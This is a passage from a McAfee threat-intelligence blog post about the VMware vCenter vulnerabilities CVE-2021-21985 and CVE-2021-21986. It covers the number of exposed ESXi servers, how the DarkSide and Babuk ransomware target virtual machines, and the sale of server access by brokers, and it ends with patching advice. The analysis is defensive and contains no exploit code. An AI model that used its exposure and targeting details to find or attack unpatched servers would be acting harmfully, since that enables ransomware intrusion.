The same exploit vector is applicable for CVE-2021-21986, which is an authentication mechanism issue in several vCenter Server Plug-ins. It would allow an attacker to run plugin functions without authentication. This leads to the CVE being scored as a ‚Äėmoderate severity‚Äô, with a CVSSv3 score of 6.5.

While writing this blog, a Proof-of-Concept was discovered that will test if the vulnerability exists; it will not execute the remote-code. The Nmap plugin can be downloaded from this location: https://github.com/alt3kx/CVE-2021-21985_PoC.

Searching with the Shodan search engine, narrowing it down to the TCP 443 port, we observe that close to 82,000 internet accessible ESXi servers are exposed. Zooming in further on the versions that are affected by these vulnerabilities,  almost 55,000 publicly accessible ESXi servers are potentially vulnerable to CVE-2021-21985 and CVE-2021-21986, providing remote access to them and making them potential candidates for ransomware attacks, as we will read about in the next paragraphs.

Ransomware Actors Going After Virtual Environments

Ransomware groups are always trying to find ways to hit their victims where it hurts. So, it is only logical that they are adapting to attacking virtualization environments and the native Unix/Linux machines running the hypervisors. In the past, ransomware groups were quick to abuse earlier CVEs affecting VMware. But aside from the disclosed CVEs, ransomware groups have also adapted their binaries specifically to encrypt virtual machines and their management environment. Below are some of the ransomware groups we have observed.

DarkSide Ransomware

Figure 1. Screenshot from the DarkSide ransomware group, explicitly mentioning its Linux-based encryptor and support for ESXi and NAS systems

McAfee Advanced Threat Research (ATR) analyzed the DarkSide Linux binary in our recent blog and we can confirm that a specific routine aimed at virtual machines is present in it.

Figure 2. DarkSide VMware Code routine

From the configuration file of the DarkSide Linux variant, it becomes clear that this variant is solely designed to encrypt virtual machines hosted on an ESXi server. It searches for the disk-files of the VMs, the memory files of the VMs (vmem), swap, logs, etc. ‚Äď all files that are needed to start a VMware virtual machine.

Demo of Darkside encrypting an ESXi server: https://youtu.be/SMWIckvLMoE

Babuk Ransomware

Babuk announced on an underground forum that it was developing a cross-platform binary aimed at Linux/UNIX and ESXi or VMware systems:

Figure 3. Babuk ransomware claiming to have built a Linux-based ransomware binary capable of encrypting ESXi servers

The malware is written in the open-source programming language Golang, most likely because it allows developers to have a single codebase to be compiled into all major operating systems. This means that, thanks to static linking, code written in Golang on a Linux system can run on a Windows or Mac system. That presents a large advantage to ransomware gangs looking to encrypt a whole infrastructure comprised of different systems architecture.

After being dropped on the ESXi server, the malware encrypts all the files on the system:

The malware was designed to target ESXi environments as we guessed, and it was confirmed when the Babuk team returned the decryptor named d_esxi.out. Unfortunately, the decryptor has been developed with some errors, which cause corruption in victim’s files:

Overall, the decryptor is poor as it only checks for the extension ‚Äú.babyk‚ÄĚ which will miss any files the victim has renamed to recover them. Also, the decryptor checks if the file is more than 32 bytes in length as the last 32 bytes are the key that will be calculated later with other hardcoded values to get the final key. This is bad design as those 32 bytes could be trash, instead of the key, as the customer could make things, etc. It does not operate efficiently by checking the paths that are checked in the malware, instead it analyzes everything. Another error we noticed was that the decryptor tries to remove a ransom note name that is NOT the same that the malware creates in each folder. This does not make any sense unless, perhaps, the Babuk developers/operators are delivering a decryptor that works for a different version and/or sample.

The problems with the Babuk decryptor left victims in horrible situations with permanently damaged data. The probability of getting a faulty decryptor isn’t persuading victims to pay up and this might be one of the main reasons that Babuk  announced that it will stop encrypting data and only exfiltrate and extort from now on.

Initial-Access-Brokers Offering VMware vCenter Machines

It is not only ransomware groups that show an interest in virtual systems; several initial access brokers are also trading access to compromised vCenter/ESXi servers on underground cybercriminal forums. The date and time of the specific offering below overlaps with the disclosure of CVE-2021-21985, but McAfee ATR hasn’t determined if this specific CVE was used to gain access to ESXi servers.

Figure 4. Threat Actor selling access to thousands of vCenter/ESXi servers

Figure 5. Threat actor offering compromised VMware ESXi servers

Patching and Detection Advice

VMware urges users running VMware vCenter and VMware Cloud Foundation affected by CVE-2021-21985 and CVE-2021-21986 to apply its patch immediately. According to VMware, a malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. The disclosed vulnerabilities have a critical CVSS base score of 9.8.

However, we do understand that VMware infrastructure is often installed on business-critical systems, so any type of patching activity usually has a high degree of impact on IT operations. Hence, the gap between vulnerability disclosure and patching is typically high. With the operating systems on VMware being a closed system they lack the ability to natively install workload protection/detection solutions. Therefore, the defenses should be based on standard cyber hygiene/risk mitigation practices and should be applied in the following order where possible.

  1. Ensure an accurate inventory of vCenter assets and their corresponding software versions.
  2. Secure the management plane of the vCenter infrastructure by applying strict network access control policies to allow access only from special management networks.
  3. Disable all internet access to vCenter/VMware Infrastructure.
  4. Apply the released VMware patches.
  5. McAfee Network Security Platform (NSP) offers signature sets for detection of CVE-2021-21985 and CVE-2021-21986.

Conclusion

Virtualization and its underlying technologies are key in today’s infrastructures. With the release of recently discovered vulnerabilities and an understanding of their criticality, threat actors are shifting focus. Proof can be seen in underground forums where affiliates recruit pentesters with knowledge of specific virtual technologies to develop custom ransomware that is designed to cripple these technologies. Remote Desktop access is the number one access vector in many ransomware cases, followed by edge-devices lacking the latest security updates, making them vulnerable to exploitation. With the latest VMware CVEs mentioned in this blog, we urge you to take the right steps to secure not only internet exposed systems, but also internal systems, to minimize the risk of your organization losing its precious VMs, or gold, to cyber criminals.

 

Special thanks to Thibault Seret, Mo Cashman, Roy Arnab and Christiaan Beek for their contributions.

The post Are Virtual Machines the New Gold for Cyber Criminals? appeared first on McAfee Blogs.

‚ĚĆ